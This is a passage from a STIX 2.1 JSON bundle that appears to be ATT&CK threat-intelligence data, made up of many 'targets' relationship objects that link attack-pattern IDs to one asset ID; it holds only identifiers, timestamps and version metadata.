"x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75010958-184d-4292-9bbb-bb28de93a572", "created": "2024-07-01T10:37:15.829821", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829823", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72104719-aeb4-43fe-b840-c2319181bbbe", "created": "2024-07-01T10:37:15.829831", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829833", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f12bb06-dc41-4db7-97c3-97078f65633c", "created": "2024-07-01T10:37:15.829841", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829843", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9c64b2c-7329-4c4e-b589-bca57bdbf510", "created": "2024-07-01T10:37:15.829851", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829853", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--58ad0500-37b1-4337-a4e9-7182b16fe764", "created": "2024-07-01T10:37:15.829861", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829863", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--55210356-6c20-4e6f-8986-457baedeeb43", "created": "2024-07-01T10:37:15.829871", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829873", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a2c8040-f5db-45c7-bdf7-92cbf81f8b4f", "created": "2024-07-01T10:37:15.829881", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829883", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b3dd356-2bc2-413a-a49f-0f94c8202711", "created": "2024-07-01T10:37:15.829891", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829893", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9fac04d-df8e-4437-8615-16cc4d3b16be", "created": "2024-07-01T10:37:15.829901", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829903", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14734f99-136a-47cd-bc0b-3aedea387959", "created": "2024-07-01T10:37:15.829911", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829913", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71721cc1-5abf-4099-b1ed-6993be746727", "created": "2024-07-01T10:37:15.829921", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829923", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47b5f64b-9447-45bf-a2d2-c0754002c7f4", "created": "2024-07-01T10:37:15.829931", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829933", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41841580-f7d5-4f42-9b60-c9e4fb7aaa50", "created": "2024-07-01T10:37:15.829941", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829943", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--629f80bf-f436-439a-aea6-d7cabf28bec7", "created": "2024-07-01T10:37:15.829951", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829954", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c35aae09-4e15-471d-859f-86b138474a33", "created": "2024-07-01T10:37:15.829961", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829964", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f57cea81-d6fb-43e0-9343-2aa20c1f59d3", "created": "2024-07-01T10:37:15.829971", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829974", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c3046ce-6b19-4ccf-979b-cde5b018091a", "created": "2024-07-01T10:37:15.829981", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829983", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3c2fbd8-c267-4fce-ab19-6ef6f8a17b7f", "created": "2024-07-01T10:37:15.829991", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.829993", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a4616c8-49ca-419a-a574-dbe0d3331f8b", "created": "2024-07-01T10:37:15.830001", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830003", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ebecb383-35d3-4375-b67e-61a765c3c5bf", "created": "2024-07-01T10:37:15.830011", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830013", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5725bcbd-3100-459e-9468-077a0f10563d", "created": "2024-07-01T10:37:15.830021", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830023", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da5927dc-6f16-4d67-b741-1680496db505", "created": "2024-07-01T10:37:15.830031", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830033", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d05fb289-d50c-4bb4-9965-c059668c47f2", "created": "2024-07-01T10:37:15.830041", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830043", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--812e7959-1957-417d-9c94-3a7ff90c2189", "created": "2024-07-01T10:37:15.830051", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830053", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a61ecbc1-af29-4379-8696-15a1f7464c54", "created": "2024-07-01T10:37:15.830061", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830063", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9e4c7bde-bc7d-4854-b347-ee3592aab559", "created": "2024-07-01T10:37:15.830071", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830073", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e229e34-0070-47ad-9cc2-1e89bbde3c8a", "created": "2024-07-01T10:37:15.830081", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830083", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf8282f8-19fe-4189-bddb-7c997afcdc26", "created": "2024-07-01T10:37:15.830091", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830093", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2d19cc4-63ae-42c4-bc42-6d0a8fb20428", "created": "2024-07-01T10:37:15.830100", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830102", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea38b4af-e84e-4cda-961c-f540139445e4", "created": "2024-07-01T10:37:15.830110", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830112", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--905e5e93-3fc2-423a-ab14-fff406e0eab6", "created": "2024-07-01T10:37:15.830120", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830122", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53ceec1e-3745-4561-aec7-bf8cb9aa2783", "created": "2024-07-01T10:37:15.830130", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830132", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--efa0d1a1-e74a-4a62-9f1c-98a7b584a354", "created": "2024-07-01T10:37:15.830140", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830142", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ad3d85ba-6416-469f-af0f-a81feeaa3672", "created": "2024-07-01T10:37:15.830150", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830152", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ea08a81-54a8-416a-929c-fe14f47cf93b", "created": "2024-07-01T10:37:15.830160", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830162", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f219a6e-cdce-4978-9ee7-9f225749c34e", "created": "2024-07-01T10:37:15.830170", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830172", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12d166b9-8319-4ba5-a43b-7834c623e0e6", "created": "2024-07-01T10:37:15.830180", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830182", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b44b9aab-ad57-4aab-95b0-b9ac1768d170", "created": "2024-07-01T10:37:15.830189", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830192", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dceb84be-6537-40dd-bf6e-0307fe812575", "created": "2024-07-01T10:37:15.830200", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830202", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f533ea57-2b4a-41f8-aa49-cabb07cc1fe6", "created": "2024-07-01T10:37:15.830210", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830212", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de72d528-70be-4fa8-a87f-2236b3797f93", "created": "2024-07-01T10:37:15.830219", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830221", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": 